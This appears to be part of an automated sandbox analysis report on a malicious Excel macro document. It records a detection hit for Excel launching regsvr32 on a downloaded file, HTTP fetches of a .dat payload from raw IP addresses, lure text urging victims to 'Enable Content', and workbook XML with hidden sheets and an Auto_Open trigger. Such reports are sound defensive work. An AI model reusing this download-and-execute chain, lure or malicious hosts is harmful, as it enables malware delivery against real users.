Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\Post.storg, CommandLine: regsvr32 -s ..\Post.storg, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2352, ProcessCommandLine: regsvr32 -s ..\Post.storg, ProcessId: 2416 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe |
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 190.14.37.134:80 |
Source: Joe Sandbox View | IP Address: 51.89.115.124 |
Source: global traffic | HTTP traffic detected: GET /44356.3971392361.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.134Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /44356.3971392361.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.124Connection: Keep-Alive |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 37.1.196.25 |
Source: unknown | TCP traffic detected without corresponding DNS query: 51.89.115.124 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC5BF66.tif |
Source: regsvr32.exe, 00000003.00000002.2206688614.0000000001D90000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2207736998.0000000001D50000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2208486859.0000000001CC0000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll |
Source: Screenshot number: 4 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click En |
Source: Screenshot number: 4 | Screenshot OCR: Enable Content button from the yellow bar above |
Source: Document image extraction number: 0 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl |
Source: Document image extraction number: 0 | Screenshot OCR: Enable Content button from the yellow bar above |
Source: workbook.xml | Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="22730"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{34C063CF-955E-4ACE-9D4C-9A051EAF3AFA}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15990" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="2" r:id="rId1"/><sheet name="nowik" sheetId="13" state="hidden" r:id="rId2"/><sheet name="1rtgvrt" sheetId="3" state="hidden" r:id="rId3"/><sheet name="2dfgv" sheetId="4" state="hidden" r:id="rId4"/><sheet name="3fescvaer" sheetId="5" state="hidden" r:id="rId5"/><sheet name="4scdac" sheetId="6" state="hidden" r:id="rId6"/><sheet name="5fetaert" sheetId="7" state="hidden" r:id="rId7"/><sheet name="6vrtgarga" sheetId="8" state="hidden" r:id="rId8"/><sheet name="7rvgasdg" sheetId="9" state="hidden" r:id="rId9"/><sheet name="8aevgadrg" sheetId="10" 
state="hidden" r:id="rId10"/><sheet name="9rrvrv" sheetId="11" state="hidden" r:id="rId11"/><sheet name="10vghsdrb" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'10vghsdrb'!$A$2</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmln |